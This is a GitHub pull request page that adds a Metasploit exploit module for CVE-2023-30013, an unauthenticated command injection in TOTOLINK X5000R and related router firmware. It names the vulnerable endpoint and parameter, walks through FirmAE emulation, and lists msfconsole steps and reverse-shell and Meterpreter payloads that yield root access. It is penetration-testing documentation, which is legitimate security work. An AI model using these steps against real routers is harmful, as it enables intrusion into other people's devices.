-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
TOTOLINK X5000R Wireless GigaBit Router Unauthenticed RCE [CVE-2023-30013] #18365
TOTOLINK X5000R Wireless GigaBit Router Unauthenticed RCE [CVE-2023-30013] #18365
Conversation
modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_x5000r_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
@msjenkins-r7 test this please |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @h00die-gr3y for this module. I just left a few minor comments. Other than that, it looks good to me. I tested against X5000R_V9.1.0u.6118_B20201102
following you installation steps (great documentation BTW) and successfully got a session with both targets.
documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb
Outdated
Show resolved
Hide resolved
Thanks @h00die-gr3y for updating this. Everything looks good to me now. I tested against the firmware X5000R_V9.1.0u.6118_B20201102 running with FirmAE and verified I got a session using both targets. I'll go ahead and land it.
|
Release NotesThis adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware |
TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102
and X5000R_V9.1.0u.6369_B20230113contains a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.After exploitation, an attacker will have full access with the same user privileges under which the webserver is running (typically as user
root
, ;-).Read this article on attackerkb.com for more details.
Ideally, to test this module, you would need a TOTOLINK X5000R Wireless GigaBit Router.
However, by downloading the firmware and install and use
FirmAE
to emulate the router, we can simulate the router and test the vulnerable endpoint.UPDATE 14 September 2023
I could not reproduce the exploit with X5000R firmware
X5000R_V9.1.0u.6369_B20230113.rar
, so please useV9.1.0u.6118_B20201102.zip
for your testing.I have also discovered other TOTOLINK firmware that is vulnerable for the same exploit.
A7000R_V9.1.0u.6115_B20201022.zip
A3700R_V9.1.2u.6134_B20201202.zip
N200RE_V5_V9.3.5u.6095_B20200916.zip
andN200RE_V5_V9.3.5u.6139_B20201216.zip
N350RT_V9.3.5u.6095_B20200916.zip
andN350RT_V9.3.5u.6139_B20201216.zip
EX1200L_V9.3.5u.6146_B20201023.zip
This module has been tested on:
Installation steps to emulate the router firmware with FirmAE
FirmAE
on your Linux distribution using the installation instructions provided here.binwalk
need to be able to handle a sasquatch filesystem which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after yourFirmAE
installation otherwise you will not be able to extract the firmware.X5000R_V9.1.0u.6118_B20201102.zip
../init.sh
to initialize and start the Postgress database../run.sh -d TOTOLINK X5000R_V9.1.0u.6118_B20201102.zip
netcat
can not connect on 192.168.0.1 and pinging this IP is also not working.1. connect to socat
to access your running firmware and run below commands to check the network configuration.eth2
insteadeth0
andbr0
did not have any IP configured.ping
the network address 192.168.0.1 from your host and run anmap
command to check the services.You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
Verification
msfconsole
use exploit/linux/http/totolink_unauth_rce_cve_2023_30013
set rhosts <ip-target>
set rport <port>
set lhost <ip-attacker>
set target <0=Unix Command, 1=Linux Dropper>
exploit
you should get a
reverse shell
orMeterpreter
Scenarios
FirmAE X5000R Router Emulation Unix Command - cmd/unix/reverse_netcat_gaping
FirmAE X5000R Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations
Staged
mipsle
payloads will core dump on the target, so use stage-lessmipsle
payloads when using the Linux Dropper target.